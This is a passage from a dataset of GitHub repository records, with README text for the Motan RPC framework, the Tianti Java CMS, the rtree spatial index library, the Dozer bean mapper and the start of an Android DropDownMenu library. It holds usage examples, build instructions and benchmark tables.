ApplicationContext ctx = new ClassPathXmlApplicationContext(""classpath:motan_client.xml"");
FooService service = (FooService) ctx.getBean(""remoteService"");
System.out.println(service.hello(""motan""));
}
}
```
Execute main function in Client will invoke the remote service and print response.
## Asynchronous calls
1. Based on the `Synchronous calls` example, add `@MotanAsync` annotation to interface `FooService`.
```java
package quickstart;
import com.weibo.api.motan.transport.async.MotanAsync;
@MotanAsync
public interface FooService {
public String hello(String name);
}
```
2. Include the plugin into the POM file to set `target/generated-sources/annotations/` as source folder.
```xml
org.codehaus.mojobuild-helper-maven-plugin1.10generate-sourcesadd-source
```
3. Modify the attribute `interface` of referer in `motan_client.xml` from `FooService` to `FooServiceAsync`.
```xml
```
4. Start asynchronous calls.
```java
public static void main(String[] args) {
ApplicationContext ctx = new ClassPathXmlApplicationContext(new String[] {""classpath:motan_client.xml""});
FooServiceAsync service = (FooServiceAsync) ctx.getBean(""remoteService"");
// sync call
System.out.println(service.hello(""motan""));
// async call
ResponseFuture future = service.helloAsync(""motan async "");
System.out.println(future.getValue());
// multi call
ResponseFuture future1 = service.helloAsync(""motan async multi-1"");
ResponseFuture future2 = service.helloAsync(""motan async multi-2"");
System.out.println(future1.getValue() + "", "" + future2.getValue());
// async with listener
FutureListener listener = new FutureListener() {
@Override
public void operationComplete(Future future) throws Exception {
System.out.println(""async call ""
+ (future.isSuccess() ? ""success! value:"" + future.getValue() : ""fail! exception:""
+ future.getException().getMessage()));
}
};
ResponseFuture future3 = service.helloAsync(""motan async multi-1"");
ResponseFuture future4 = service.helloAsync(""motan async multi-2"");
future3.addListener(listener);
future4.addListener(listener);
}
```
# Documents
- [Wiki](https://github.com/weibocom/motan/wiki)
- [Wiki(中文)](https://github.com/weibocom/motan/wiki/zh_overview)
# Contributors
- maijunsheng([@maijunsheng](https://github.com/maijunsheng))
- fishermen([@hustfisher](https://github.com/hustfisher))
- TangFulin([@tangfl](https://github.com/tangfl))
- bodlyzheng([@bodlyzheng](https://github.com/bodlyzheng))
- jacawang([@jacawang](https://github.com/jacawang))
- zenglingshu([@zenglingshu](https://github.com/zenglingshu))
- Sugar Zouliu([@lamusicoscos](https://github.com/lamusicoscos))
- tangyang([@tangyang](https://github.com/tangyang))
- olivererwang([@olivererwang](https://github.com/olivererwang))
- jackael([@jackael9856](https://github.com/jackael9856))
- Ray([@rayzhang0603](https://github.com/rayzhang0603))
- r2dx([@half-dead](https://github.com/half-dead))
- Jake Zhang([sunnights](https://github.com/sunnights))
- axb([@qdaxb](https://github.com/qdaxb))
- wenqisun([@wenqisun](https://github.com/wenqisun))
- fingki([@fingki](https://github.com/fingki))
- 午夜([@sumory](https://github.com/sumory))
- guanly([@guanly](https://github.com/guanly))
- Di Tang([@tangdi](https://github.com/tangdi))
- 肥佬大([@feilaoda](https://github.com/feilaoda))
- 小马哥([@andot](https://github.com/andot))
- wu-sheng([@wu-sheng](https://github.com/wu-sheng)) _Assist Motan to become the first Chinese RPC framework on [OpenTracing](http://opentracing.io) **Supported Frameworks List**_
- Jin Zhang([@lowzj](https://github.com/lowzj))
- xiaoqing.yuanfang([@xiaoqing-yuanfang](https://github.com/xiaoqing-yuanfang))
- 东方上人([@dongfangshangren](https://github.com/dongfangshangren))
- Voyager3([@xxxxzr](https://github.com/xxxxzr))
- yeluoguigen009([@yeluoguigen009](https://github.com/yeluoguigen009))
- Michael Yang([@yangfuhai](https://github.com/yangfuhai))
- Panying([@anylain](https://github.com/anylain))
# License
Motan is released under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0).
[maven]:https://maven.apache.org
[gradle]:http://gradle.org
[consul]:http://www.consul.io
[zookeeper]:http://zookeeper.apache.org
"
xujeff/tianti,master,1097,590,2017-02-08T08:21:02Z,29124,29,java轻量级的CMS解决方案-天梯。天梯是一个用java相关技术搭建的后台CMS解决方案,用户可以结合自身业务进行相应扩展,同时提供了针对dao、service等的代码生成工具。技术选型:Spring Data JPA、Hibernate、Shiro、 Spring MVC、Layer、Mysql等。,cms hibernate java layer mysql shiro spring-data-jpa spring-mvc,"# 天梯(tianti)
[天梯](https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487)[tianti-tool](https://github.com/xujeff/tianti-tool)简介:
1、天梯是一款使用Java编写的免费的轻量级CMS系统,目前提供了从后台管理到前端展现的整体解决方案。
2、用户可以不编写一句代码,就制作出一个默认风格的CMS站点。
3、前端页面自适应,支持PC和H5端,采用前后端分离的机制实现。后端支持天梯蓝和天梯红换肤功能。
4、项目技术分层明显,用户可以根据自己的业务模块进行相应地扩展,很方便二次开发。
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/tiantiframework.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/help/help.png)
技术架构:
1、技术选型:
后端
·核心框架:Spring Framework 4.2.5.RELEASE
·安全框架:Apache Shiro 1.3.2
·视图框架:Spring MVC 4.2.5.RELEASE
·数据库连接池:Tomcat JDBC
·缓存框架:Ehcache
·ORM框架:Spring Data JPA、hibernate 4.3.5.Final
·日志管理:SLF4J 1.7.21、Log4j
·编辑器:ueditor
·工具类:Apache Commons、Jackson 2.8.5、POI 3.15
·view层:JSP
·数据库:mysql、oracle等关系型数据库
前端
·dom : Jquery
·分页 : jquery.pagination
·UI管理 : common
·UI集成 : uiExtend
·滚动条 : jquery.nicescroll.min.js
·图表 : highcharts
·3D图表 :highcharts-more
·轮播图 : jquery-swipe
·表单提交 :jquery.form
·文件上传 :jquery.uploadify
·表单验证 :jquery.validator
·展现树 :jquery.ztree
·html模版引擎 :template
2、项目结构:
2.1、tianti-common:系统基础服务抽象,包括entity、dao和service的基础抽象;
2.2、tianti-org:用户权限模块服务实现;
2.3、tianti-cms:资讯类模块服务实现;
2.4、tianti-module-admin:天梯后台web项目实现;
2.5、tianti-module-interface:天梯接口项目实现;
2.6、tianti-module-gateway:天梯前端自适应项目实现(是一个静态项目,调用tianti-module-interface获取数据);
前端项目概览:
PC:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/index.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/columnlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/detail.png)
H5:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/index.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/columnlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/detail.png)
后台项目概览:
天梯登陆页面:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/login.png)
天梯蓝风格(默认):
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/userlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/rolelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/menulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/roleset.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/updatePwd.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/skin.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/lanmulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addlanmu.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/articlelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addarticle.png)
天梯红风格:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/userlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/rolelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/menulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/roleSet.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/updatePwd.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/skin.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/lanmulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addlanmu.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/articlelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addarticle.png)
"
davidmoten/rtree,master,1071,211,2014-08-26T12:29:14Z,1812,34,Immutable in-memory R-tree and R*-tree implementations in Java with reactive api,,"rtree
=========
[![Coverity Scan](https://scan.coverity.com/projects/4762/badge.svg?flat=1)](https://scan.coverity.com/projects/4762?tab=overview)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree/badge.svg?style=flat)](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree)
[![codecov](https://codecov.io/gh/davidmoten/rtree/branch/master/graph/badge.svg)](https://codecov.io/gh/davidmoten/rtree)
In-memory immutable 2D [R-tree](http://en.wikipedia.org/wiki/R-tree) implementation in java using [RxJava Observables](https://github.com/ReactiveX/RxJava) for reactive processing of search results.
Status: *released to Maven Central*
Note that the **next version** (without a reactive API and without serialization) is at [rtree2](https://github.com/davidmoten/rtree2).
An [R-tree](http://en.wikipedia.org/wiki/R-tree) is a commonly used spatial index.
This was fun to make, has an elegant concise algorithm, is thread-safe, fast, and reasonably memory efficient (uses structural sharing).
The algorithm to achieve immutability is cute. For insertion/deletion it involves recursion down to the
required leaf node then recursion back up to replace the parent nodes up to the root. The guts of
it is in [Leaf.java](src/main/java/com/github/davidmoten/rtree/internal/LeafDefault.java) and [NonLeaf.java](src/main/java/com/github/davidmoten/rtree/internal/NonLeafDefault.java).
[Backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) support required some complexity because effectively a
bookmark needed to be kept for a position in the tree and returned to later to continue traversal. An immutable stack containing
the node and child index of the path nodes came to the rescue here and recursion was abandoned in favour of looping to prevent stack overflow (unfortunately java doesn't support tail recursion!).
Maven site reports are [here](http://davidmoten.github.io/rtree/index.html) including [javadoc](http://davidmoten.github.io/rtree/apidocs/index.html).
Features
------------
* immutable R-tree suitable for concurrency
* Guttman's heuristics (Quadratic splitter) ([paper](https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB8QFjAA&url=http%3A%2F%2Fpostgis.org%2Fsupport%2Frtree.pdf&ei=ieEQVJuKGdK8uATpgoKQCg&usg=AFQjCNED9w2KjgiAa9UI-UO_0eWjcADTng&sig2=rZ_dzKHBHY62BlkBuw3oCw&bvm=bv.74894050,d.c2E))
* R*-tree heuristics ([paper](http://dbs.mathematik.uni-marburg.de/publications/myPapers/1990/BKSS90.pdf))
* Customizable [splitter](src/main/java/com/github/davidmoten/rtree/Splitter.java) and [selector](src/main/java/com/github/davidmoten/rtree/Selector.java)
* 10x faster index creation with STR bulk loading ([paper](https://www.researchgate.net/profile/Scott_Leutenegger/publication/3686660_STR_A_Simple_and_Efficient_Algorithm_for_R-Tree_Packing/links/5563368008ae86c06b676a02.pdf)).
* search returns [```Observable```](http://reactivex.io/RxJava/javadoc/rx/Observable.html)
* search is cancelled by unsubscription
* search is ```O(log(n))``` on average
* insert, delete are ```O(n)``` worst case
* all search methods return lazy-evaluated streams offering efficiency and flexibility of functional style including functional composition and concurrency
* balanced delete
* uses structural sharing
* supports [backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure)
* JMH benchmarks
* visualizer included
* serialization using [FlatBuffers](http://github.com/google/flatbuffers)
* high unit test [code coverage](http://davidmoten.github.io/rtree/cobertura/index.html)
* R*-tree performs 900,000 searches/second returning 22 entries from a tree of 38,377 Greek earthquake locations on i7-920@2.67Ghz (maxChildren=4, minChildren=1). Insert at 240,000 entries per second.
* requires java 1.6 or later
Number of points = 1000, max children per node 8:
| Quadratic split | R*-tree split | STR bulk loaded |
| :-------------: | :-----------: | :-----------: |
| | | |
Notice that there is little overlap in the R*-tree split compared to the
Quadratic split. This should provide better search performance (and in general benchmarks show this).
STR bulk loaded R-tree has a bit more overlap than R*-tree, which affects the search performance at some extent.
Getting started
----------------
Add this maven dependency to your pom.xml:
```xml
com.github.davidmotenrtreeVERSION_HERE
```
### Instantiate an R-Tree
Use the static builder methods on the ```RTree``` class:
```java
// create an R-tree using Quadratic split with max
// children per node 4, min children 2 (the threshold
// at which members are redistributed)
RTree tree = RTree.create();
```
You can specify a few parameters to the builder, including *minChildren*, *maxChildren*, *splitter*, *selector*:
```java
RTree tree = RTree.minChildren(3).maxChildren(6).create();
```
### Geometries
The following geometries are supported for insertion in an RTree:
* `Rectangle`
* `Point`
* `Circle`
* `Line`
### Generic typing
If for instance you know that the entry geometry is always ```Point``` then create an ```RTree``` specifying that generic type to gain more type safety:
```java
RTree tree = RTree.create();
```
### R*-tree
If you'd like an R*-tree (which uses a topological splitter on minimal margin, overlap area and area and a selector combination of minimal area increase, minimal overlap, and area):
```
RTree tree = RTree.star().maxChildren(6).create();
```
See benchmarks below for some of the performance differences.
### Add items to the R-tree
When you add an item to the R-tree you need to provide a geometry that represents the 2D physical location or
extension of the item. The ``Geometries`` builder provides these factory methods:
* ```Geometries.rectangle```
* ```Geometries.circle```
* ```Geometries.point```
* ```Geometries.line``` (requires *jts-core* dependency)
To add an item to an R-tree:
```java
RTree tree = RTree.create();
tree = tree.add(item, Geometries.point(10,20));
```
or
```java
tree = tree.add(Entries.entry(item, Geometries.point(10,20));
```
*Important note:* being an immutable data structure, calling ```tree.add(item, geometry)``` does nothing to ```tree```,
it returns a new ```RTree``` containing the addition. Make sure you use the result of the ```add```!
### Remove an item in the R-tree
To remove an item from an R-tree, you need to match the item and its geometry:
```java
tree = tree.delete(item, Geometries.point(10,20));
```
or
```java
tree = tree.delete(entry);
```
*Important note:* being an immutable data structure, calling ```tree.delete(item, geometry)``` does nothing to ```tree```,
it returns a new ```RTree``` without the deleted item. Make sure you use the result of the ```delete```!
### Geospatial geometries (lats and longs)
To handle wraparounds of longitude values on the earth (180/-180 boundary trickiness) there are special factory methods in the `Geometries` class. If you want to do geospatial searches then you should use these methods to build `Point`s and `Rectangle`s:
```java
Point point = Geometries.pointGeographic(lon, lat);
Rectangle rectangle = Geometries.rectangleGeographic(lon1, lat1, lon2, lat2);
```
Under the covers these methods normalize the longitude value to be in the interval [-180, 180) and for rectangles the rightmost longitude has 360 added to it if it is less than the leftmost longitude.
### Custom geometries
You can also write your own implementation of [```Geometry```](src/main/java/com/github/davidmoten/rtree/geometry/Geometry.java). An implementation of ```Geometry``` needs to specify methods to:
* check intersection with a rectangle (you can reuse the distance method here if you want but it might affect performance)
* provide a minimum bounding rectangle
* implement ```equals``` and ```hashCode``` for consistent equality checking
* measure distance to a rectangle (0 means they intersect). Note that this method is only used for search within a distance so implementing this method is *optional*. If you don't want to implement this method just throw a ```RuntimeException```.
For the R-tree to be well-behaved, the distance function if implemented needs to satisfy these properties:
* ```distance(r) >= 0 for all rectangles r```
* ```if rectangle r1 contains r2 then distance(r1)<=distance(r2)```
* ```distance(r) = 0 if and only if the geometry intersects the rectangle r```
### Searching
The advantage of an R-tree is the ability to search for items in a region reasonably quickly.
On average search is ```O(log(n))``` but worst case is ```O(n)```.
Search methods return ```Observable``` sequences:
```java
Observable> results =
tree.search(Geometries.rectangle(0,0,2,2));
```
or search for items within a distance from the given geometry:
```java
Observable> results =
tree.search(Geometries.rectangle(0,0,2,2),5.0);
```
To return all entries from an R-tree:
```java
Observable> results = tree.entries();
```
Search with a custom geometry
-----------------------------------
Suppose you make a custom geometry like ```Polygon``` and you want to search an ```RTree``` for points inside the polygon. This is how you do it:
```java
RTree tree = RTree.create();
Func2 pointInPolygon = ...
Polygon polygon = ...
...
entries = tree.search(polygon, pointInPolygon);
```
The key is that you need to supply the ```intersects``` function (```pointInPolygon```) to the search. It is on you to implement that for all types of geometry present in the ```RTree```. This is one reason that the generic ```Geometry``` type was added in *rtree* 0.5 (so the type system could tell you what geometry types you needed to calculate intersection for) .
Search with a custom geometry and maxDistance
--------------------------------------------------
As per the example above to do a proximity search you need to specify how to calculate distance between the geometry you are searching and the entry geometries:
```java
RTree tree = RTree.create();
Func2 distancePointToPolygon = ...
Polygon polygon = ...
...
entries = tree.search(polygon, 10, distancePointToPolygon);
```
Example
--------------
```java
import com.github.davidmoten.rtree.RTree;
import static com.github.davidmoten.rtree.geometry.Geometries.*;
RTree tree = RTree.maxChildren(5).create();
tree = tree.add(""DAVE"", point(10, 20))
.add(""FRED"", point(12, 25))
.add(""MARY"", point(97, 125));
Observable> entries =
tree.search(Geometries.rectangle(8, 15, 30, 35));
```
Searching by distance on lat longs
------------------------------------
See [LatLongExampleTest.java](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example. The example depends on [*grumpy-core*](https://github.com/davidmoten/grumpy) artifact which is also on Maven Central.
Another lat long example searching geo circles
------------------------------------------------
See [LatLongExampleTest.testSearchLatLongCircles()](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example of searching circles around geographic points (using great circle distance).
What do I do with the Observable thing?
-------------------------------------------
Very useful, see [RxJava](http://github.com/ReactiveX/RxJava).
As an example, suppose you want to filter the search results then apply a function on each and reduce to some best answer:
```java
import rx.Observable;
import rx.functions.*;
import rx.schedulers.Schedulers;
Character result =
tree.search(Geometries.rectangle(8, 15, 30, 35))
// filter for names alphabetically less than M
.filter(entry -> entry.value() < ""M"")
// get the first character of the name
.map(entry -> entry.value().charAt(0))
// reduce to the first character alphabetically
.reduce((x,y) -> x <= y ? x : y)
// subscribe to the stream and block for the result
.toBlocking().single();
System.out.println(list);
```
output:
```
D
```
How to configure the R-tree for best performance
--------------------------------------------------
Check out the benchmarks below and refer to [another benchmark results](https://github.com/ambling/rtree-benchmark#results), but I recommend you do your own benchmarks because every data set will behave differently. If you don't want to benchmark then use the defaults. General rules based on the benchmarks:
* for data sets of <10,000 entries use the default R-tree (quadratic splitter with maxChildren=4)
* for data sets of >=10,000 entries use the star R-tree (R*-tree heuristics with maxChildren=4 by default)
* use STR bulk loaded R-tree (quadratic splitter or R*-tree heuristics) for large (where index creation time is important) or static (where insertion and deletion are not frequent) data sets
Watch out though, the benchmark data sets had quite specific characteristics. The 1000 entry dataset was randomly generated (so is more or less uniformly distributed) and the *Greek* dataset was earthquake data with its own clustering characteristics.
What about memory use?
------------------------
To minimize memory use you can use geometries that store single precision decimal values (`float`) instead of double precision (`double`). Here are examples:
```java
// create geometry using double precision
Rectangle r = Geometries.rectangle(1.0, 2.0, 3.0, 4.0);
// create geometry using single precision
Rectangle r = Geometries.rectangle(1.0f, 2.0f, 3.0f, 4.0f);
```
The same creation methods exist for `Circle` and `Line`.
How do I just get an Iterable back from a search?
---------------------------------------------------------
If you are not familiar with the Observable API and want to skip the reactive stuff then here's how to get an ```Iterable``` from a search:
```java
Iterable it = tree.search(Geometries.point(4,5))
.toBlocking().toIterable();
```
Backpressure
-----------------
The backpressure slow path may be enabled by some RxJava operators. This may slow search performance by a factor of 3 but avoids possible out of memory errors and thread starvation due to asynchronous buffering. Backpressure is benchmarked below.
Visualizer
--------------
To visualize the R-tree in a PNG file of size 600 by 600 pixels just call:
```java
tree.visualize(600,600)
.save(""target/mytree.png"");
```
The result is like the images in the Features section above.
Visualize as text
--------------------
The ```RTree.asString()``` method returns output like this:
```
mbr=Rectangle [x1=10.0, y1=4.0, x2=62.0, y2=85.0]
mbr=Rectangle [x1=28.0, y1=4.0, x2=34.0, y2=85.0]
entry=Entry [value=2, geometry=Point [x=29.0, y=4.0]]
entry=Entry [value=1, geometry=Point [x=28.0, y=19.0]]
entry=Entry [value=4, geometry=Point [x=34.0, y=85.0]]
mbr=Rectangle [x1=10.0, y1=45.0, x2=62.0, y2=63.0]
entry=Entry [value=5, geometry=Point [x=62.0, y=45.0]]
entry=Entry [value=3, geometry=Point [x=10.0, y=63.0]]
```
Serialization
------------------
Release 0.8 includes [flatbuffers](https://github.com/google/flatbuffers) support as a serialization format and as a lower performance but lower memory consumption (approximately one third) option for an RTree.
The greek earthquake data (38,377 entries) when placed in a default RTree with `maxChildren=10` takes up 4,548,133 bytes in memory. If that data is serialized then reloaded into memory using the `InternalStructure.FLATBUFFERS_SINGLE_ARRAY` option then the RTree takes up 1,431,772 bytes in memory (approximately one third the memory usage). Bear in mind though that searches are much more expensive (at the moment) with this data structure because of object creation and gc pressures (see benchmarks). Further work would be to enable direct searching of the underlying array without object creation expenses required to match the current search routines.
As of 5 March 2016, indicative RTree metrics using flatbuffers data structure are:
* one third the memory use with log(N) object creations per search
* one third the speed with backpressure (e.g. if `flatMap` or `observeOn` is downstream)
* one tenth the speed without backpressure
Note that serialization uses an optional dependency on `flatbuffers`. Add the following to your pom dependencies:
```xml
com.google.flatbuffersflatbuffers-java2.0.3true
```
## Serialization example
Write an `RTree` to an `OutputStream`:
```java
RTree tree = ...;
OutputStream os = ...;
Serializer serializer =
Serializers.flatBuffers().utf8();
serializer.write(tree, os);
```
Read an `RTree` from an `InputStream` into a low-memory flatbuffers based structure:
```java
RTree tree =
serializer.read(is, lengthBytes, InternalStructure.SINGLE_ARRAY);
```
Read an `RTree` from an `InputStream` into a default structure:
```java
RTree tree =
serializer.read(is, lengthBytes, InternalStructure.DEFAULT);
```
Dependencies
---------------------
As of 0.7.5 this library does not depend on *guava* (>2M) but rather depends on *guava-mini* (11K). The `nearest` search used to depend on `MinMaxPriorityQueue` from guava but now uses a backport of Java 8 `PriorityQueue` inside a custom `BoundedPriorityQueue` class that gives about 1.7x the throughput as the guava class.
How to build
----------------
```
git clone https://github.com/davidmoten/rtree.git
cd rtree
mvn clean install
```
How to run benchmarks
--------------------------
Benchmarks are provided by
```
mvn clean install -Pbenchmark
```
Coverity scan
----------------
This codebase is scanned by Coverity scan whenever the branch `coverity_scan` is updated.
For the project committers if a coverity scan is desired just do this:
```bash
git checkout coverity_scan
git pull origin master
git push origin coverity_scan
```
### Notes
The *Greek* data referred to in the benchmarks is a collection of some 38,377 entries corresponding to the epicentres of earthquakes in Greece between 1964 and 2000. This data set is used by multiple studies on R-trees as a test case.
### Results
These were run on i7-920 @2.67GHz with *rtree* version 0.8-RC7:
```
Benchmark Mode Cnt Score Error Units
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 262260.993 ± 2767.035 ops/s
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 296264.913 ± 2836.358 ops/s
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 135118.271 ± 1722.039 ops/s
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 315851.452 ± 3097.496 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 278761.674 ± 4182.761 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 315254.478 ± 4104.206 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 214509.476 ± 1555.816 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 118094.486 ± 1118.983 ops/s
defaultRTreeSearchOf1000PointsMaxChildren004 thrpt 10 1122140.598 ± 8509.106 ops/s
defaultRTreeSearchOf1000PointsMaxChildren010 thrpt 10 569779.807 ± 4206.544 ops/s
defaultRTreeSearchOf1000PointsMaxChildren032 thrpt 10 238251.898 ± 3916.281 ops/s
defaultRTreeSearchOf1000PointsMaxChildren128 thrpt 10 702437.901 ± 5108.786 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 462243.509 ± 7076.045 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 326395.724 ± 1699.043 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 156978.822 ± 1993.372 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 68267.160 ± 929.236 ops/s
rStarTreeDeleteOneEveryOccurrenceFromGreekDataChildren010 thrpt 10 211881.061 ± 3246.693 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 187062.089 ± 3005.413 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 186767.045 ± 2291.196 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 37940.625 ± 743.789 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 151897.089 ± 674.941 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 237708.825 ± 1644.611 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 229577.905 ± 4234.760 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 78290.971 ± 393.030 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 6521.010 ± 50.798 ops/s
rStarTreeSearchOf1000PointsMaxChildren004 thrpt 10 1330510.951 ± 18289.410 ops/s
rStarTreeSearchOf1000PointsMaxChildren010 thrpt 10 1204347.202 ± 17403.105 ops/s
rStarTreeSearchOf1000PointsMaxChildren032 thrpt 10 576765.468 ± 8909.880 ops/s
rStarTreeSearchOf1000PointsMaxChildren128 thrpt 10 1028316.856 ± 13747.282 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 904494.751 ± 15640.005 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 649636.969 ± 16383.786 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffers thrpt 10 84230.053 ± 1869.345 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffersBackpressure thrpt 10 36420.500 ± 1572.298 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010WithBackpressure thrpt 10 116970.445 ± 1955.659 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 224874.016 ± 14462.325 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 358636.637 ± 4886.459 ops/s
searchNearestGreek thrpt 10 3715.020 ± 46.570 ops/s
```
There is a related project [rtree-benchmark](https://github.com/ambling/rtree-benchmark) that presents a more comprehensive benchmark with results and analysis on this rtree implementation.
"
DozerMapper/dozer,master,2057,480,2012-01-23T21:11:58Z,21656,6,Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another. ,,"[![Build, Test and Analyze](https://github.com/DozerMapper/dozer/actions/workflows/build.yml/badge.svg)](https://github.com/DozerMapper/dozer/actions/workflows/build.yml)
[![Release Version](https://img.shields.io/maven-central/v/com.github.dozermapper/dozer-core.svg?maxAge=2592000)](https://mvnrepository.com/artifact/com.github.dozermapper/dozer-core)
[![License](https://img.shields.io/hexpm/l/plug.svg?maxAge=2592000)]()
# Dozer
## Project Activity
The project is currently not active and will more than likely be deprecated in the future. If you are looking to use Dozer
on a greenfield project, we would discourage that. If you have been using Dozer for a while, we would suggest you start to think about migrating
onto another library, such as:
- [mapstruct](https://github.com/mapstruct/mapstruct)
- [modelmapper](https://github.com/modelmapper/modelmapper)
For those moving to mapstruct, the community has created a [Intellij plugin](https://plugins.jetbrains.com/plugin/20853-dostruct) that can help with the migration.
## Why Map?
A mapping framework is useful in a layered architecture where you are creating layers of abstraction by encapsulating changes to particular data objects vs. propagating these objects to other layers (i.e. external service data objects, domain objects, data transfer objects, internal service data objects).
Mapping between data objects has traditionally been addressed by hand coding value object assemblers (or converters) that copy data between the objects. Most programmers will develop some sort of custom mapping framework and spend countless hours and thousands of lines of code mapping to and from their different data object.
This type of code for such conversions is rather boring to write, so why not do it automatically?
## What is Dozer?
Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another, it is an open source mapping framework that is robust, generic, flexible, reusable, and configurable.
Dozer supports simple property mapping, complex type mapping, bi-directional mapping, implicit-explicit mapping, as well as recursive mapping. This includes mapping collection attributes that also need mapping at the element level.
Dozer not only supports mapping between attribute names, but also automatically converting between types. Most conversion scenarios are supported out of the box, but Dozer also allows you to specify custom conversions via XML or code-based configuration.
## Getting Started
Check out the [Getting Started Guide](https://dozermapper.github.io/gitbook/documentation/gettingstarted.html), [Full User Guide](https://dozermapper.github.io/user-guide.pdf) or [GitBook](https://dozermapper.github.io/gitbook/) for advanced information.
## Getting the Distribution
If you are using Maven, simply copy-paste this dependency to your project.
```XML
com.github.dozermapperdozer-core7.0.0
```
## Simple Example
```XML
yourpackage.SourceClassNameyourpackage.DestinationClassNameyourSourceFieldNameyourDestinationFieldName
```
```Java
SourceClassName sourceObject = new SourceClassName();
sourceObject.setYourSourceFieldName(""Dozer"");
Mapper mapper = DozerBeanMapperBuilder.buildDefault();
DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class);
assertTrue(destObject.getYourDestinationFieldName().equals(sourceObject.getYourSourceFieldName()));
```
"
dongjunkun/DropDownMenu,master,3591,789,2015-06-23T07:43:56Z,14892,56,一个实用的多条件筛选菜单,dongjunkun dropdown-menus,"[![](https://jitpack.io/v/dongjunkun/DropDownMenu.svg)](https://jitpack.io/#dongjunkun/DropDownMenu)
## 简介
一个实用的多条件筛选菜单,在很多App上都能看到这个效果,如美团,爱奇艺电影票等
我的博客 [自己造轮子--android常用多条件帅选菜单实现思路(类似美团,爱奇艺电影票下拉菜单)](http://www.jianshu.com/p/d9407f799d2d)
## 特色
- 支持多级菜单
- 你可以完全自定义你的菜单样式,我这里只是封装了一些实用的方法,Tab的切换效果,菜单显示隐藏效果等
- 并非用popupWindow实现,无卡顿
## ScreenShot
Download APK
或者扫描二维码
## Gradle Dependency
```
allprojects {
repositories {
...
